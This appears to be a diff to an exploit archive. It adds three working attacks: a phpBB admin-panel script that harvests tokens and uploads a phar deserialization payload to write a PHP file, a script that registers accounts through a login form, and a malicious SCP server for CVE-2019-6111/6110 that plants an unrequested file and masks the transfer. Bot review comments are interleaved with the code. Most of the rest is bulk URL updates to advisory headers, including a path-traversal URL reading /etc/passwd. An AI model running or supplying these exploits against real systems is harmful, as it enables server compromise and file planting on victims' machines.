@@ -0,0 +1,64 @@ +// All greets goes to RIPS Tech +// Run this JS on Attachment Settings ACP page +var plupload_salt = ''; +var form_token = ''; +var creation_time = ''; +var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip +// your payload here +var payload = '\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"\x10\x5c\x04\x00\x00\x00\x0c~\x7f\xd8\xb6\x01'+'\x00'.repeat(6)+'test\xa0\x17\xd2\xe0R\xcf \xf6T\x1d\x01X\x91(\x9dD]X\x0b>\x02\x00\x00\x00GBMB'; +var byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);}); +var sid = (new URL(document.location.href)).searchParams.get('sid'); +var url = '/adm/index.php'; +var getparams = { + 'i': 'acp_database', + 'sid': sid, + 'mode': 'backup' +}; +$.get(url, getparams, function(data) { + form_token = $(data).find('[name="form_token"]').val(); + creation_time = $(data).find('[name="creation_time"]').val(); + if(form_token && creation_time) { + var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download'; + var postdata = { + 'type': 'data', + 'method': 'text', + 'where': 'download', + 'table[]': 'phpbb_config', + 'submit': 'Submit', + 'creation_time': creation_time, + 'form_token': form_token + } + $.post(posturl.replace("|", sid), postdata, function (data) { + plupload_salt = data.match(/plupload_salt',\s*'(\w{32})/)[1]; + if (plupload_salt) { + filepath = filepath.replace("$salt", plupload_salt); + var 
postdata = new FormData(); + postdata.append('name', 'evil.zip'); + postdata.append('chunk', 0); + postdata.append('chunks', 2); + postdata.append('add_file', 'Add the file'); + postdata.append('real_filename', 'evil.zip'); + // file + var pharfile = new File([byteArray], 'evil.zip'); + postdata.append('fileupload', pharfile); + jQuery.ajax({ + url: '/posting.php?mode=reply&f=2&t=1', + data: postdata, + cache: false, + contentType: false, + processData: false, + method: 'POST', + success: function(data){ + if ("id" in data) { + $('#img_imagick').val(filepath).focus(); + $('html, body').animate({ + scrollTop: ($('#submit').offset().top) + }, 500); + } + } + }); + + } + }, 'text'); + } +}); \ No newline at end of file diff --git a/exploits/multiple/remote/46514.js b/exploits/multiple/remote/46514.js new file mode 100644 index 000000000..1c246f1f2 --- /dev/null +++ b/exploits/multiple/remote/46514.js 
@@ -0,0 +1,45 @@ +var login = 'testuser'; //логин пользователя +var password = 'SuperMEgaPa$$'; //пароль +var email = 'testusername654@mailinater.com'; // email +/* Code */ +var b = BS.LoginForm; +var public_key = $F("publicKey"); +var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey")); +var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass; +var c = OO.extend(BS.ErrorsAwareListener, { + onDuplicateAccountError: function(b) { + alert(b.firstChild.nodeValue); + }, + onMaxNumberOfUserAccountsReachedError: function(b) { + alert(b.firstChild.nodeValue); + }, + onCreateUserError: function(b) { + alert(b.firstChild.nodeValue); + }, + onCompleteSave: function(c, d, b) { + BS.ErrorsAwareListener.onCompleteSave(c, d, b); + if (!b) { + BS.XMLResponse.processRedirect(d); + } + } + }); +BS.ajaxRequest("registerUserSubmit.html", { + method: "post", + parameters: parameters, + onComplete: function(i) { + if (!i.responseXML) { + alert(i.responseText); + } else { + var h = i.responseXML; + var e = BS.XMLResponse.processErrors(h, c); + console.log(i.responseText); + c.onCompleteSave(b, h, e, i.responseText); + } + }, + onFailure: function(i) { + console.log(i); + }, + onException: function(i, h) { + console.log(i); + } + }); \ No newline at end of file diff --git a/exploits/multiple/remote/46516.py b/exploits/multiple/remote/46516.py new file mode 100755 index 000000000..d871c0d9b --- /dev/null +++ b/exploits/multiple/remote/46516.py 
@@ -0,0 +1,151 @@ +''' +Title: SSHtranger Things +Author: Mark E. Haase +Homepage: https://www.hyperiongray.com +Date: 2019-01-17 +CVE: CVE-2019-6111, CVE-2019-6110 +Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt +Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 + +We have nicknamed this "SSHtranger Things" because the bug is so old it could be +exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko` +package. + +The server listens on port 2222. It accepts any username and password, and it +generates a new host key every time you run it. + + $ python3 sshtranger_things.py + +Download a file using a vulnerable client. The local path must be a dot: + + $ scp -P 2222 foo@localhost:test.txt . + The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. + RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w. + Are you sure you want to continue connecting (yes/no)? yes + Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. + foo@localhost's password: + test.txt 100% 32 0.7KB/s 00:00 + +The file you requested (e.g. test.txt) will be saved in your current directory. +If your client is vulnerable, you will have an additional file "exploit.txt" +created in your current directory. + + $ cat test.txt + This is the file you requested. + $ cat exploit.txt + SSHtranger Things + +The interesting code is in ScpServer.send_file(). 
+''' +import base64 +import gzip +import logging +import paramiko +import paramiko.rsakey +import socket +import threading + +logging.basicConfig(level=logging.INFO) + +dummy = 'This is the file you requested.\n' +payload = gzip.decompress(base64.b64decode( + b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46' + b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA' + b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7' + b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d' + b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM' + b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz' + b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4' + b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc' + b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS' + b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA' +)) + +class ScpServer(paramiko.ServerInterface): + def __init__(self): + self.event = threading.Event() + + def check_auth_password(self, username, password): + logging.info('Authenticated with %s:%s', username, password) + return paramiko.AUTH_SUCCESSFUL + + def check_channel_request(self, kind, chanid): + logging.info('Opened session channel %d', chanid) + if kind == "session": + return paramiko.OPEN_SUCCEEDED + return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED + + def check_channel_exec_request(self, channel, command): + command = command.decode('ascii') + logging.info('Approving exec request: %s', command) + parts = command.split(' ') + # Make sure that this is a request to get a file: + assert parts[0] == 'scp' + assert '-f' in parts + file = parts[-1] + # Send file from a new thread. + threading.Thread(target=self.send_file, args=(channel, file)).start() + return True + + def send_file(self, channel, file): + ''' + The meat of the exploit: + 1. 
Send the requested file. + 2. Send another file (exploit.txt) that was not requested. + 3. Print ANSI escape sequences to stderr to hide the transfer of + exploit.txt. + ''' + def wait_ok(): + assert channel.recv(1024) == b'\x00' + def send_ok(): + channel.sendall(b'\x00') + + wait_ok() + + logging.info('Sending requested file "%s" to channel %d', file, + channel.get_id()) + command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii') + channel.sendall(command) + wait_ok() + channel.sendall(dummy) + send_ok() + wait_ok() + + # This is CVE-2019-6111: whatever file the client requested, we send + # them 'exploit.txt' instead. + logging.info('Sending malicious file "exploit.txt" to channel %d', + channel.get_id()) + command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii') + channel.sendall(command) + wait_ok() + channel.sendall(payload) + send_ok() + wait_ok() + + # This is CVE-2019-6110: the client will display the text that we send + # to stderr, even if it contains ANSI escape sequences. We can send + # ANSI codes that clear the current line to hide the fact that a second + # file was transmitted.. + logging.info('Covering our tracks by sending ANSI escape sequence') + channel.sendall_stderr("\x1b[1A".encode('ascii')) + channel.close() + +def main(): + logging.info('Creating a temporary RSA host key...') + host_key = paramiko.rsakey.RSAKey.generate(1024) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('localhost', 2222)) + sock.listen(0) + logging.info('Listening on port 2222...') + + while True: + client, addr = sock.accept() + logging.info('Received connection from %s:%s', *addr) + transport = paramiko.Transport(client) + transport.add_server_key(host_key) + server = ScpServer() + transport.start_server(server=server) + +if __name__ == '__main__': + main() \ No newline at end of file 
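Review bot: in exploits/multiple/remote/39258.txt and 39259.txt the rewritten line is `source: https://www.securityfocus.com/bid/68/info`, and the context line after it ends with a stray `663/info`, which suggests the original reference was split by the example URL that now sits in the middle of it. The bulk scheme replace carries that damage forward unchanged, so the link as written is unlikely to be the intended reference. Repair the header in both files by hand instead of letting the search-and-replace touch them.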
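Review bot: exploits/multiple/remote/46513.java is added with a `.java` extension, but its second line says `Run this JS on Attachment Settings ACP page` and the body is jQuery (`$.get`, `$.post`, `jQuery.ajax`), so the extension misclassifies the file for anyone indexing or scanning the archive by language. Rename it to `.js` and add the kind of header 46516.py carries (title, author, date, tested version, CVE or advisory link), since nothing in the file names the affected release. The file also ends without a trailing newline.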
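Review bot: exploits/multiple/remote/46514.js has no header at all: no title, affected product or version, author, or reference, so the file cannot be tied to an advisory from its contents. The three inline comments on the `login`, `password` and `email` lines are in Russian and should be translated to match the English used elsewhere in this patch, and the sample values on those lines should be marked as placeholders. Add a header comment block along the lines of the one in 46516.py.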
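Review bot: in exploits/multiple/remote/46516.py, `check_auth_password` logs the submitted credentials in cleartext (`logging.info('Authenticated with %s:%s', username, password)`), so anyone who tests a client against this server and types a real password out of habit leaves it in the log; log the username only. In `check_channel_exec_request` the request is validated with `assert parts[0] == 'scp'` and `assert '-f' in parts`, which disappear under `python -O` and otherwise raise inside the server callback; return False for anything that is not an `scp -f` request. Two comments in `send_file` also disagree with the code: the CVE-2019-6111 comment says exploit.txt is sent "instead", although it is sent after the requested file, and the CVE-2019-6110 comment says the ANSI codes "clear the current line", while the sequence sent is `\x1b[1A`, which moves the cursor up one line.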
diff --git a/exploits/multiple/remote/4673.rb b/exploits/multiple/remote/4673.rb index 5ebc7fecc..da4277231 100755 --- a/exploits/multiple/remote/4673.rb +++ b/exploits/multiple/remote/4673.rb @@ -6,7 +6,7 @@ # http://www.milw0rm.com/exploits/4651 (recent Microsoft Windows exploit) # From Metasploit: apple_quicktime_rtsp_response.rb (by MC and HD Moore) # http://nvd.nist.gov/nvd.cfm?cvename=CVE-2002-0252 -# BID: http://www.securityfocus.com/bid/26549 +# BID: https://www.securityfocus.com/bid/26549 # # Notes: # Payload badchars: \x00 \x09 \x0a \x0d \x20 \x22 \x25 \x26 \x27 \x2b \x2f diff --git a/exploits/multiple/remote/9993.txt b/exploits/multiple/remote/9993.txt index f6d55d432..0ebc79d54 100644 --- a/exploits/multiple/remote/9993.txt +++ b/exploits/multiple/remote/9993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34383/info +source: https://www.securityfocus.com/bid/34383/info The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/11403.txt b/exploits/multiple/webapps/11403.txt index 9103e539a..73bfef604 100644 --- a/exploits/multiple/webapps/11403.txt +++ b/exploits/multiple/webapps/11403.txt @@ -78,8 +78,8 @@ Related Public Info =================== -http://www.securityfocus.com/bid/3592/info +https://www.securityfocus.com/bid/3592/info -http://www.securityfocus.com/bid/1578/info +https://www.securityfocus.com/bid/1578/info -http://www.securityfocus.com/bid/1328/info \ No newline at end of file +https://www.securityfocus.com/bid/1328/info \ No newline at end of file diff --git a/exploits/multiple/webapps/11404.txt b/exploits/multiple/webapps/11404.txt index f3caec750..3e3413de2 100644 --- a/exploits/multiple/webapps/11404.txt +++ b/exploits/multiple/webapps/11404.txt 
@@ -14,7 +14,7 @@ Ref's: http://securitytracker.com/alerts/2005/May/1014077.html -http://www.securityfocus.com/bid/13817/exploit +https://www.securityfocus.com/bid/13817/exploit diff --git a/exploits/multiple/webapps/21082.txt b/exploits/multiple/webapps/21082.txt index 0a0d58648..c7f4edbc7 100644 --- a/exploits/multiple/webapps/21082.txt +++ b/exploits/multiple/webapps/21082.txt @@ -15,5 +15,5 @@ Testing environment: Sentinel Log Manager Appliance 1.2.0.1 Vulnerable URL: /novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd -BID: http://www.securityfocus.com/bid/51104/info +BID: https://www.securityfocus.com/bid/51104/info CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028 \ No newline at end of file diff --git a/exploits/multiple/webapps/24573.txt b/exploits/multiple/webapps/24573.txt index 7a2bd8ec2..4683389ea 100644 --- a/exploits/multiple/webapps/24573.txt +++ b/exploits/multiple/webapps/24573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11111/info +source: https://www.securityfocus.com/bid/11111/info Keene Digital Media Server is prone to multiple cross-site scripting vulnerabilities. These issues span multiple scripts. The source of the problem is that affected scripts do not sufficiently sanitize externally supplied data before rendering it to a client user. An attacker may exploit these issues by enticing a victim user to follow a malicious link. diff --git a/exploits/multiple/webapps/24792.txt b/exploits/multiple/webapps/24792.txt index 7f5c5b5e8..919fa472b 100644 --- a/exploits/multiple/webapps/24792.txt +++ b/exploits/multiple/webapps/24792.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11779/info +source: https://www.securityfocus.com/bid/11779/info IPCop is reported susceptible to an HTML injection vulnerability in its proxy log viewer. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web pages. diff --git a/exploits/multiple/webapps/28340.c b/exploits/multiple/webapps/28340.c index 6b22dce9b..759bc5469 100644 --- a/exploits/multiple/webapps/28340.c +++ b/exploits/multiple/webapps/28340.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/19333/info +source: https://www.securityfocus.com/bid/19333/info Applications running pswd.js are prone to an insecure password-hash weakness. This issue is due to a design flaw that results in password hashes being created in an insecure manner. diff --git a/exploits/multiple/webapps/31233.txt b/exploits/multiple/webapps/31233.txt index a1d2c7a25..d27913521 100644 --- a/exploits/multiple/webapps/31233.txt +++ b/exploits/multiple/webapps/31233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27875/info +source: https://www.securityfocus.com/bid/27875/info webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data. diff --git a/exploits/multiple/webapps/31234.txt b/exploits/multiple/webapps/31234.txt index 73c991ad6..5408c1000 100644 --- a/exploits/multiple/webapps/31234.txt +++ b/exploits/multiple/webapps/31234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27875/info +source: https://www.securityfocus.com/bid/27875/info webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data. diff --git a/exploits/multiple/webapps/31673.txt b/exploits/multiple/webapps/31673.txt index aab92a712..87f18614c 100644 --- a/exploits/multiple/webapps/31673.txt 
+++ b/exploits/multiple/webapps/31673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28848/info +source: https://www.securityfocus.com/bid/28848/info Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/webapps/32576.txt b/exploits/multiple/webapps/32576.txt index fc4e11951..21ad8480b 100644 --- a/exploits/multiple/webapps/32576.txt +++ b/exploits/multiple/webapps/32576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32233/info +source: https://www.securityfocus.com/bid/32233/info IBM Tivoli Netcool Service Quality Manager is prone to multiple cross-site scripting and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/32631.txt b/exploits/multiple/webapps/32631.txt index 204f0ee5a..4712f192a 100644 --- a/exploits/multiple/webapps/32631.txt +++ b/exploits/multiple/webapps/32631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32574/info +source: https://www.securityfocus.com/bid/32574/info IBM Rational ClearCase is prone to a cross-site scripting vulnerability because the software fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/32894.txt b/exploits/multiple/webapps/32894.txt index 1c774b13d..688e27d8c 100644 --- a/exploits/multiple/webapps/32894.txt +++ b/exploits/multiple/webapps/32894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34447/info +source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: diff --git a/exploits/multiple/webapps/32895.txt b/exploits/multiple/webapps/32895.txt index 7294573a1..7907cc987 100644 --- a/exploits/multiple/webapps/32895.txt +++ b/exploits/multiple/webapps/32895.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34447/info +source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: diff --git a/exploits/multiple/webapps/32896.html b/exploits/multiple/webapps/32896.html index 031ebe03d..8d55a5d27 100644 --- a/exploits/multiple/webapps/32896.html +++ b/exploits/multiple/webapps/32896.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34447/info +source: https://www.securityfocus.com/bid/34447/info IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities: diff --git a/exploits/multiple/webapps/32908.txt b/exploits/multiple/webapps/32908.txt index 956a57f65..73003583b 100644 --- a/exploits/multiple/webapps/32908.txt +++ b/exploits/multiple/webapps/32908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34513/info +source: https://www.securityfocus.com/bid/34513/info IBM Tivoli Continuous Data Protection for Files is prone to a cross-site scripting vulnerability. diff --git a/exploits/multiple/webapps/33180.txt b/exploits/multiple/webapps/33180.txt index 24b056d7d..4a06458a9 100644 --- a/exploits/multiple/webapps/33180.txt +++ b/exploits/multiple/webapps/33180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36087/info +source: https://www.securityfocus.com/bid/36087/info Adobe Flex SDK is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to express-install template files. diff --git a/exploits/multiple/webapps/33284.txt b/exploits/multiple/webapps/33284.txt index 300a79731..0f0dcf931 100644 --- a/exploits/multiple/webapps/33284.txt +++ b/exploits/multiple/webapps/33284.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36672/info +source: https://www.securityfocus.com/bid/36672/info Pentaho BI is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly validate user-supplied input. diff --git a/exploits/multiple/webapps/33438.txt b/exploits/multiple/webapps/33438.txt index 32ff0e592..c866cdf10 100644 --- a/exploits/multiple/webapps/33438.txt +++ b/exploits/multiple/webapps/33438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37451/info +source: https://www.securityfocus.com/bid/37451/info webMathematica is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33511.txt b/exploits/multiple/webapps/33511.txt index 96460f831..e0dbde258 100644 --- a/exploits/multiple/webapps/33511.txt +++ b/exploits/multiple/webapps/33511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37802/info +source: https://www.securityfocus.com/bid/37802/info Zenoss is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/33578.txt b/exploits/multiple/webapps/33578.txt index 6de1a60e3..9a0e6612e 100644 --- a/exploits/multiple/webapps/33578.txt +++ b/exploits/multiple/webapps/33578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37999/info +source: https://www.securityfocus.com/bid/37999/info XAMPP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/multiple/webapps/33717.txt b/exploits/multiple/webapps/33717.txt index 823d3b43e..44bffea50 100644 --- a/exploits/multiple/webapps/33717.txt +++ b/exploits/multiple/webapps/33717.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38575/info +source: https://www.securityfocus.com/bid/38575/info Six Apart Vox is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33731.txt b/exploits/multiple/webapps/33731.txt index b8d17882e..af164d409 100644 --- a/exploits/multiple/webapps/33731.txt +++ b/exploits/multiple/webapps/33731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38634/info +source: https://www.securityfocus.com/bid/38634/info Friendly Technologies TR-069 ACS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/33759.txt b/exploits/multiple/webapps/33759.txt index 089c8d11b..0a4f62232 100644 --- a/exploits/multiple/webapps/33759.txt +++ b/exploits/multiple/webapps/33759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38721/info +source: https://www.securityfocus.com/bid/38721/info DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33760.txt b/exploits/multiple/webapps/33760.txt index 7ca2d7cf5..38f2b4449 100644 --- a/exploits/multiple/webapps/33760.txt +++ b/exploits/multiple/webapps/33760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38732/info +source: https://www.securityfocus.com/bid/38732/info Multiple products are prone to a cross-site scripting vulnerability because the applications fail to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33764.txt b/exploits/multiple/webapps/33764.txt index 2e8e562df..50b1f2037 100644 --- a/exploits/multiple/webapps/33764.txt +++ b/exploits/multiple/webapps/33764.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38739/info +source: https://www.securityfocus.com/bid/38739/info Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/33765.txt b/exploits/multiple/webapps/33765.txt index d1b977f6c..5c55cbae1 100644 --- a/exploits/multiple/webapps/33765.txt +++ b/exploits/multiple/webapps/33765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38739/info +source: https://www.securityfocus.com/bid/38739/info Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/33937.txt b/exploits/multiple/webapps/33937.txt index 8ee95c4a4..7988e2e1a 100644 --- a/exploits/multiple/webapps/33937.txt +++ b/exploits/multiple/webapps/33937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39926/info +source: https://www.securityfocus.com/bid/39926/info TYPO3 't3m_cumulus_tagcloud' extension is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/33995.txt b/exploits/multiple/webapps/33995.txt index 00e4b9efa..ad69ff8a5 100644 --- a/exploits/multiple/webapps/33995.txt +++ b/exploits/multiple/webapps/33995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40212/info +source: https://www.securityfocus.com/bid/40212/info Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34000.txt b/exploits/multiple/webapps/34000.txt index fd7a8ab9f..0726f91bd 100644 --- a/exploits/multiple/webapps/34000.txt +++ b/exploits/multiple/webapps/34000.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40236/info +source: https://www.securityfocus.com/bid/40236/info Serialsystem is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34111.txt b/exploits/multiple/webapps/34111.txt index bea366b97..b9c840c8f 100644 --- a/exploits/multiple/webapps/34111.txt +++ b/exploits/multiple/webapps/34111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40676/info +source: https://www.securityfocus.com/bid/40676/info GREEZLE - Global Real Estate Agent Site is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/34136.txt b/exploits/multiple/webapps/34136.txt index 343521032..5cc072dfe 100644 --- a/exploits/multiple/webapps/34136.txt +++ b/exploits/multiple/webapps/34136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40813/info +source: https://www.securityfocus.com/bid/40813/info Plesk Server Administrator (PSA) is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34224.txt b/exploits/multiple/webapps/34224.txt index e9af10bda..c100b2f9f 100644 --- a/exploits/multiple/webapps/34224.txt +++ b/exploits/multiple/webapps/34224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41229/info +source: https://www.securityfocus.com/bid/41229/info Kryn.cms is prone to a cross-site request-forgery vulnerability and an HTML-injection vulnerability. diff --git a/exploits/multiple/webapps/34237.txt b/exploits/multiple/webapps/34237.txt index e414f949c..715e0581d 100644 --- a/exploits/multiple/webapps/34237.txt +++ b/exploits/multiple/webapps/34237.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41322/info +source: https://www.securityfocus.com/bid/41322/info Xplico is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34907.txt b/exploits/multiple/webapps/34907.txt index 657b619a6..d00a00210 100644 --- a/exploits/multiple/webapps/34907.txt +++ b/exploits/multiple/webapps/34907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34908.txt b/exploits/multiple/webapps/34908.txt index c383752f2..87fb0c039 100644 --- a/exploits/multiple/webapps/34908.txt +++ b/exploits/multiple/webapps/34908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34909.txt b/exploits/multiple/webapps/34909.txt index 92b9d71d8..cdeffbc86 100644 --- a/exploits/multiple/webapps/34909.txt +++ b/exploits/multiple/webapps/34909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34910.txt b/exploits/multiple/webapps/34910.txt index c9ff7d08f..eb923e95d 100644 --- a/exploits/multiple/webapps/34910.txt +++ b/exploits/multiple/webapps/34910.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34911.txt b/exploits/multiple/webapps/34911.txt index 20754078e..2b85e85d9 100644 --- a/exploits/multiple/webapps/34911.txt +++ b/exploits/multiple/webapps/34911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34912.txt b/exploits/multiple/webapps/34912.txt index a480802db..e5fbd85c0 100644 --- a/exploits/multiple/webapps/34912.txt +++ b/exploits/multiple/webapps/34912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34913.txt b/exploits/multiple/webapps/34913.txt index b4b587c4d..6d1e6177d 100644 --- a/exploits/multiple/webapps/34913.txt +++ b/exploits/multiple/webapps/34913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting 